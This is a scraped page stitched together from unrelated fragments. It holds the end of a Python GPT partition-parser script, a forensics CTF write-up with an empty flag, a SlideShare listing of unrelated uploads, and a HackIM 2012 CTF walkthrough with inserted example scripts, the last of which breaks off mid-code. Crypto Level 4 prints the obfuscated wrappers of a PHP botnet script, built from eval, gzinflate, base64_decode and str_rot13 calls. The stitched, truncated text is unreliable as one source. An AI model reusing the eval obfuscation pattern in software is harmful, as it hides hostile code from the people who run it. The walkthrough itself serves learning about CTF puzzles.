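        parts.append((name.decode("utf-16-le").rstrip("\0"),
                      str(uuid.UUID(bytes_le=type_guid)), first, last))
    return sorted(parts, key=lambda p: p[2])


def unpartitioned_gaps(parts):
    """Return [(start_lba, end_lba)] for each unused range between sorted partitions."""
    gaps = []
    for (_, _, _, prev_last), (_, _, next_first, _) in zip(parts, parts[1:]):
        if next_first > prev_last + 1:
            gaps.append((prev_last + 1, next_first - 1))
    return gaps


def build_sample(num_entries_field):
    """Construct a 20 KiB image: zeroed LBA 0, header at LBA 1, 128 entry slots at LBA 2-33.

    The Linux filesystem type GUID is the published one; the three partitions
    (written out of order, with a hole between two of them) are invented.
    """
    linux_fs = uuid.UUID("0FC63DAF-8483-4772-8E79-3D69D8477DE4").bytes_le
    layout = [("data", 2048, 4095), ("boot", 34, 2047), ("home", 6144, 8191)]
    entries = b"".join(
        ENTRY.pack(linux_fs, uuid.UUID(int=i + 1).bytes_le, first, last, 0,
                   name.encode("utf-16-le").ljust(72, b"\0"))
        for i, (name, first, last) in enumerate(layout)).ljust(128 * 128, b"\0")
    hdr = bytearray(HDR.pack(b"EFI PART", 0x00010000, 92, 0, 0, 1, 20479, 34, 20446,
                             uuid.UUID(int=0xD15C).bytes_le, 2, num_entries_field, 128,
                             zlib.crc32(entries)))
    struct.pack_into("<I", hdr, 16, zlib.crc32(bytes(hdr)))   # header CRC over zeroed field
    img = bytearray(40 * LBA)
    img[LBA:LBA + 92] = hdr
    img[2 * LBA:2 * LBA + len(entries)] = entries
    return bytes(img)


if __name__ == "__main__":
    for label, img in (("intact header", build_sample(128)), ("zeroed count", build_sample(0))):
        hdr = parse_header(img)
        parts = parse_entries(img, hdr)
        print(f"[{label}] crc_ok={hdr['crc_ok']} num_entries={hdr['num_entries']} "
              f"-> {len(parts)} partitions")
        for name, guid, first, last in parts:
            print(f"  {name:6} {guid}  LBA {first}-{last}")
        print("  unpartitioned:", unpartitioned_gaps(parts))
```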




Forensics Level 5: Universal Swindlers Bayonet

Official Hint:

Page Source: <!-- Format Expected: "DD/MM/YYYY HH:MM:SS" -->

Description: Anusandhaanic Daakus Ltd. is a company whose strength lies in the research it
conducts. Very often the employees leaving the organisation manage to carry the research data
along with them. This time the company decided to go for an investigation and called upon a forensic
investigator. This investigator captured the memory dump and shut the system down. On
resuming the system he finds that the drive has been encrypted and is left with only the memory
dump.
You as an investigator are required to find out the following information from the dump:
1) Serial No. of the external drive
2) Date and time (IST) when the drive was first connected
3) Date and time (IST) when the drive was last connected
4) Launching which other executable (not nullcon.exe) resulted in launching of nullcon.exe

Analysis: This level was all about memory dump investigation. As usual, had to look up in Google
to find some memory dump analysis tool. Came across Memoryze and Audit Viewer. I installed them
and fired up Audit Viewer to analyze the dump. The GUI was easy to understand and had a
wizard which I followed accordingly. After a while I got the results in a simply formatted
way. I tried going through the windows but couldn’t find anything much relevant and ended up
getting only the last flag.
Again went through the various links and came across a tool named Volatility. Installed it and
played with it for a while. With the following working steps I got the rest of the flags:
    1. I tried to locate the registry hive where we could find the external drive information.

    2. The second last registry hive was supposed to store all the drive information.
    3. I dumped the second last hive and got a very long list of registry information.
    4. The challenge was to look for the external drive information. I went through a few analysis
       articles and found that the USBSTOR key stores the external USB drive information.
    5. Hence ended up with the following command and got the result successfully.
    6. But still the flag was not yet complete; the page source revealed that the expected time
       must be in IST, hence we had to add +5:30 to the time when the drive was first connected and
       last disconnected.

Flag:




Finally Near The End, Few Words:
   - All the links and tools mentioned above were functioning during this write-up and I
     cannot assume them to be working throughout.
   - I apologize for any grammatical mistakes or for my poor English.
   - The ideas mentioned above are my own and may differ from yours.
   - I completely agree with the fact that there can be much better ways to solve the above
     challenges, but eventually my ideas worked out.
   - Wish Happy Hacking to Everyone.
   - End, Regards To All The Members of NULL.

The epic story ends here…..

~$-THE END-$~

 
Infrastructure as code might be literally impossible part 2
Infrastructure as code might be literally impossible part 2Infrastructure as code might be literally impossible part 2
Infrastructure as code might be literally impossible part 2
 

Recently uploaded

GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
DianaGray10
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
danishmna97
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
Neo4j
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
名前 です男
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
Mariano Tinti
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
Matthew Sinclair
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
KAMESHS29
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 

Recently uploaded (20)

GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 

HackIM 2012 CTF Walkthrough

Trivia Levels

Trivia Level 1
Official Hint: N/A
Page Source: Nothing Interesting
Description: This operating system also refers to a 1982 science fiction film, a board game, and a song off the Prodigy B-Side "What Evil Lurks"
Analysis: A quick Google search with the keyword “scifi movie list 1982” revealed android as the first result.
Flag: android

Trivia Level 2
Official Hint: N/A
Page Source: Nothing Interesting
Description: This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying packets with malicious intent.
Analysis: A Google search with the keyword “fictional IPv4 packet header field” revealed the flag.
Flag: evil bit

Trivia Level 3
Official Hint: N/A
Page Source: Nothing Interesting
Description: This humorous RFC of the Internet Engineering Task Force describes a communication and control protocol suite designed for allowing infinite numbers of monkeys with infinite numbers of typewriters to produce the entire works of William Shakespeare.
Analysis: A Google search with the keyword “communication and control protocol suite designed for allowing infinite numbers of monkeys” revealed the flag.
Flag: RFC 2795
Trivia Level 4
Official Hint: N/A
Page Source: Nothing Interesting
Description: Metasploit was originally coded for what purpose?
Analysis: I can remember going through the book “Metasploit Toolkit”, where it was mentioned that Metasploit was originally started as a network security game.
Flag: game

Trivia Level 5
Official Hint: N/A
Page Source: Nothing Interesting
Description: Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds to compose commands.
Analysis: A Google search with the keyword “April 1st 2003 programming language” revealed the flag as whitespace.
Flag: whitespace

Crypto Levels

Crypto Level 1: Ulta Pulta
Official Hint: poiuyt
Page Source: <!-- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled-keyboard-computer-mirror1_VXLbh_24429.jpg"> -->
Description: Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 Ceaa Glyik
Analysis: The page source revealed an image of a mirrored keyboard. Carefully mapping each character of the given string on the keyboard, right side to left and vice versa, revealed the flag.
Keyboard Mapping:
  3 == 0
  - == 2
  . == ,
  q == p
  a == l
  z == m
Flag: Windows 2000 already contains features such as the human discipline component, where the PC can send an electric shock through the keyboard if the human does something that does not please Windows. - Bill Gates

Crypto Level 2: White Noise
Official Hint: Follow the White Rabbit: P (by spnow)
Page Source: <!-- md5sum: b80a5ce8b0c6c57a0258f34dd5905970 -->
Description: shhhkoinahihai
Analysis:
First Attempt (leet way): I went through the Wikipedia article about Whitespace (programming language) and got an idea that the given whitespace contains tabs and spaces, which must be replaced by 1 and 0.
  1. Copied the whitespace to gedit (text editor).
  2. Replaced the tabs with 1 and spaces with 0.
  3. Got the following sequence of 0’s and 1’s.
  4. Now this binary sequence needs to be converted into something meaningful, so I googled for “binary to text translator” and got an online tool at http://home.paulschou.net/tools/xlate/
  5. Translated the binary sequence, but to my surprise I couldn’t get any meaningful information. Where did I have it wrong?
Second Attempt (leet way):
  6. After some thought, I came to conclude: how about replacing tabs with 0 and spaces with 1?
  7. There, got a new sequence, with expectations.
  8. Again I used the same binary to text translator, and voila!!! There was our flag.
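Both attempts above, as an added example that is not part of the original writeup: decode a Whitespace-style blob by trying both tab/space-to-bit assignments and keeping the one that yields printable text. The encoded sample is constructed here; the level's real whitespace file is not on the page.

```python
# Added example, not from the original writeup: decoding a Whitespace-style blob the way
# Crypto Level 2 was solved, trying both tab/space-to-bit assignments at once.
# The encoded sample is constructed below; the level's real whitespace file is not on the page.

def bits_to_text(bits):
    """Pack a '0'/'1' string into 8-bit characters; the length must be a multiple of 8."""
    if len(bits) % 8:
        raise ValueError("bit string length %d is not a multiple of 8" % len(bits))
    return ''.join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))

def decode_whitespace(blob):
    """Try both mappings (the author's first and second attempts) and return both results."""
    ws = ''.join(c for c in blob if c in '\t ')      # keep only tabs and spaces
    mappings = {"tab=1,space=0": ('1', '0'),         # first attempt: produced garbage
                "tab=0,space=1": ('0', '1')}         # second attempt: produced the flag
    results = {}
    for name, (tab_bit, space_bit) in mappings.items():
        bits = ws.replace('\t', tab_bit).replace(' ', space_bit)
        results[name] = bits_to_text(bits)
    return results

def best_guess(blob):
    """Return (mapping, text) for the first mapping whose output is all printable ASCII."""
    for name, text in decode_whitespace(blob).items():
        if text and all(32 <= ord(c) < 127 for c in text):
            return name, text
    return None, None

def encode_whitespace(text):
    """Constructed encoder used only to build the sample: bit 0 -> tab, bit 1 -> space."""
    bits = ''.join(format(ord(c), '08b') for c in text)
    return bits.replace('0', '\t').replace('1', ' ')

# Constructed sample input (stands in for the level's whitespace file)
SAMPLE = encode_whitespace("MS KB 276304")

if __name__ == "__main__":
    mapping, text = best_guess(SAMPLE)
    print(mapping, "->", repr(text))
```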
Alternate Method: The above method seems to require lots of hard work. Thus, we can solve the above problem in this alternate way:
  1. Copy the whitespace to gedit (text editor) and save it.
  2. In Linux there is a utility called “tr” to translate characters.
  3. Type the following at the terminal (note: there is a space after \t):
       cat whitespace.txt | tr "\t " "01"
  4. There is our binary sequence; again we can copy it into the binary to text translator to get the flag.
Flag: Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your Previous 30689 Passwords - MS KB 276304

Crypto Level 3: The Base Test
Official Hint: http://lmgtfy.com/?q=RFC+for+base+encoding
Page Source: ====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====
Description: N/A
Analysis: I went through RFC 4648 twice but didn’t find anything highly influential that could eventually get me to the flag. However, I got a very basic idea about the patterns of the various types of base encodings. My assumptions on the given string were:
  - Rot-13
  - Reverse
  - Base64
  - Base32
Went through combinations of several of the above assumptions, and finally got the flag with the following steps:
  1. Remove = from both ends of the given string.
  2. Reverse the string:
       JVJDEVZWKZCFGTSGIRLUWVJTJJHFMUKXLFMUYT2NKJEEOTZSJRKU4RJ5HU6T2PJ5
  3. Apply base32 decoding:
       MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======
  4. Again apply base32 decoding to the result of step 3 to get the flag.
To reverse the text: http://textmechanic.com/Reverse-Text-Generator.html
To decode base32: http://online-calculators.appspot.com/base32/
Flag: duoTriGeSimalandNgiti

Crypto Level 4: Elucidate
Official Hint: N/A
Page Source: <!-- md5sum: ad4e2705406ef1197f03f93474e30020 -->
Description: Elucidate
Analysis: Nothing seems better than sleeping rather than going on decoding those obfuscated PHP scripts. The first, laziest thing I decided to do was to look for an online tool that would do the job without requiring me to go through several decoding steps. Eventually I came across an online tool: http://www.whitefirdesign.com/resources/unobfuscate-php-hack-code.html
Now back to the analysis part again. Let us understand the script part by part:
  <?php $vaa8089358f2="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($vaa8089358f2("**base 64 encoded string**")); ?>
  - On the first line, a variable is set to a string represented by a mix of hexadecimal (‘\x’) and octal (‘\’) escape sequences. Python uses the same escapes as PHP for hex and octal, so it’s easy to use the Python shell to see a “normalized” ASCII representation of these strings:
Python Shell Below:
       >>> "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"
       'base64_decode'
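Back to Crypto Level 3, as an added example that is not part of the original writeup: the four steps above done offline with Python's base64 module instead of the two web tools, plus a small "peel until it stops being base32" loop that shows the chain is exactly two layers deep. Only the page-source string from the level is used as input.

```python
# Added example, not from the original writeup: the Crypto Level 3 chain done offline with
# Python's base64 module, plus a loop that keeps peeling base32 layers until one fails.
import base64
import binascii

# The page-source string quoted in the level, decorative '=' included
PAGE_SOURCE = "====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ===="

def unwrap(s):
    """Steps 1-4 of the writeup: strip the '=' from both ends, reverse, base32-decode twice."""
    core = s.strip("=")
    rev = core[::-1]                                   # 64 base32 chars, needs no padding
    stage1 = base64.b32decode(rev).decode("ascii")     # 40 bytes: base32 again, with real padding
    stage2 = base64.b32decode(stage1).decode("ascii")  # 21 bytes: the flag
    return rev, stage1, stage2

def peel_base32(text, max_layers=5):
    """Repeatedly base32-decode while the result is still valid base32 text; return every layer."""
    layers = [text]
    for _ in range(max_layers):
        try:
            nxt = base64.b32decode(layers[-1]).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break                                      # bad padding/alphabet or not text: stop here
        layers.append(nxt)
    return layers

if __name__ == "__main__":
    for layer in peel_base32(PAGE_SOURCE.strip("=")[::-1]):
        print(layer)
```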
  - The next idea was to decode the base64 encoded string.
  - I used the online tool mentioned above and got an unformatted PHP script.
  - A quick Google search revealed that there was a PHP formatter at http://www.prettyprinter.de
  - So by this time I had decoded the base64 encoded string with proper formatting.
  - On further analysis I found another obfuscated script (the long base64 payload is omitted here):
       @eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc8b9a2789e95fa("...base64 payload..."))));
  - And there was another base64 encoded string inside it.
  - Now the online tool comes into play. The above script is of the form:
       @eval(gzinflate(base64_decode(str_rot13("base64_encoded"))));
  - The output revealed some kind of botnet behaviour; however at this point I was least bothered about this fact, and kept on observing it.
  - A quick overview of the output attracted me with the following variable:
       $_4fa3332ef3d19e9840387434b8d28780 = "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61";
  - Hoping this would be the final step, I used the Python shell. In case anyone doesn’t have Python installed, Google App Engine for Python would really be helpful at http://shell.appspot.com/, or there may be multiple other ways to decode that.
       >>> "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61"
       'onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena'
Flag: onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena

Crypto Level 5: Yeah! As you guessed, it’s Steganography
Official Hint: Yeah! As you guessed, it’s Steganography
Page Source: <!-- Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd -->
Description: Llun Saving Bank is fed up with known encryption standards to store the data. They decided to reinvent the wheel. Can you decode the data?
Analysis: A close look at the initials of the title “Llun Saving Bank” suggests LSB. I didn’t know much about the LSB encoding technique in text; however I had come across one with an image in some war-game. I had a look at LSB on Wikipedia and got the idea to take the rightmost bit of each character. I converted the given text into binary and whoa, I was left with a long list of binary. Picking out the rightmost bit by hand was a real challenge, so a simple Python script made my task easier:
       result = ''
       ciphertext = '<paste binary here>'        # e.g. "01001000 01110011 00100000 ..."
       ciphertext = ciphertext.replace(' ', '')  # drop the separating spaces so each byte is exactly 8 characters
       for i in range(7, len(ciphertext), 8):    # index 7, 15, 23, ... is the rightmost (least significant) bit of each byte
           result += ciphertext[i]
       print(result)
Note: My Python script assumes the binary with a space between each byte, something like “01001000 01110011 00100000…” and so on. On executing the Python script I was able to get the LSB of each character, which I converted to ASCII using http://home.paulschou.net/tools/xlate/, and there was our flag in plain text.
Flag: Learn howto Hide in Plain Sight
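The LSB technique above in both directions, as an added example that is not part of the original writeup: the author's script reads a pre-converted bit string, whereas this works on the text itself, embedding one secret bit into the lowest bit of each cover character and extracting it again. The cover is constructed (the Epicurus quotation the level's page source visibly matches); a 16-character secret is used because the full flag needs more cover characters than this quotation has.

```python
# Added example, not from the original writeup: LSB text steganography as used in
# Crypto Level 5, in both directions. One secret bit goes into the lowest bit of each
# cover character, so 'I' (0x49) becomes 'H' (0x48), a space (0x20) becomes '!' (0x21)
# and ',' becomes '-'. The cover below is constructed (the Epicurus quotation that the
# level's page source visibly matches); embedding the flag's first letters into it
# reproduces the page source's opening "Hs Foe vhmmhng un!qrdvdo".

COVER = ("Is God willing to prevent evil, but not able? Then he is not omnipotent. "
         "Is he able, but not willing? Then he is malevolent. "
         "Is he both able and willing? Then whence cometh evil? "
         "Is he neither able nor willing? Then why call him God? - Epicurus")

def embed_lsb(cover, secret):
    """Hide secret (plus a NUL terminator) in the least significant bit of each cover character."""
    bits = ''.join(format(ord(c), '08b') for c in secret + '\x00')
    if len(bits) > len(cover):
        raise ValueError("cover too short: %d characters needed, %d available" % (len(bits), len(cover)))
    stego = [chr((ord(ch) & ~1) | int(b)) for ch, b in zip(cover, bits)]
    return ''.join(stego) + cover[len(bits):]      # untouched tail keeps its natural LSBs

def extract_lsb(stego):
    """Collect the LSB of every character, 8 bits per byte, and stop at the NUL terminator."""
    bits = ''.join(str(ord(ch) & 1) for ch in stego)
    out = []
    for i in range(0, len(bits) - 7, 8):
        ch = chr(int(bits[i:i + 8], 2))
        if ch == '\x00':
            break
        out.append(ch)
    return ''.join(out)

if __name__ == "__main__":
    hidden = embed_lsb(COVER, "Learn howto Hide")
    print(hidden[:24])          # Hs Foe vhmmhng un!qrdvdo
    print(extract_lsb(hidden))  # Learn howto Hide
```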
Programming Levels

Programming Level 1: ROTOMATA
Official Hint: N/A
Page Source: <!-- We only know the first 6 characters: "Men at" -->
Description: Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit
Analysis: I really didn’t spend much time on decoding the whole string. Rather, I analyzed the difference between the first three words, and then googled for it.
  M-M=0
  e-f=1
  n-p=2
  space=3
  a-e=4
  t-y=5
  space=6
  s-z=7
  o-w=8
  m-v=9
  e-o=10
Hence the first three words that I obtained were “Men at some”. After I googled it, I got the famous quote by William Shakespeare, which was the flag.
Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but in ourselves, that we are underlings
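The crib step above in code, as an added example that is not part of the original writeup: it recovers the per-position shifts from the known "Men at" prefix and decodes with a shift schedule. The "fitted" schedule is derived here by lining the full ciphertext up against the quoted flag (the challenge's own generator is not on the page): the 0, 1, 2, ... ramp the author noticed holds for the first 27 characters and then reverses direction at positions 27, 53 and 79, which is why decoding the opening words and searching for the quote was the practical route.

```python
# Added example, not from the original writeup: the crib step the author did by hand for
# ROTOMATA, and a decoder driven by a per-position shift schedule. Every character,
# including spaces and punctuation, advances the position; only letters are shifted.
# The "fitted" schedule below was derived here against the quoted flag; the
# challenge's own generator is not on the page.

CIPHER = ("Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, "
          "zk hjp gm nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit")
FLAG = ("Men at some time are masters of their fates: The fault, dear Brutus, "
        "is not in our stars, but in ourselves, that we are underlings")

def shifts_from_crib(cipher, crib):
    """Per-position shift (cipher letter minus plain letter, mod 26); None for non-letters."""
    return [(ord(c.lower()) - ord(p.lower())) % 26 if c.isalpha() else None
            for c, p in zip(cipher, crib)]

def rotate(text, schedule, decrypt=True):
    """Shift the letter at index i by schedule(i) (subtracting when decrypting), keeping case."""
    out = []
    for i, ch in enumerate(text):
        if ch.isalpha():
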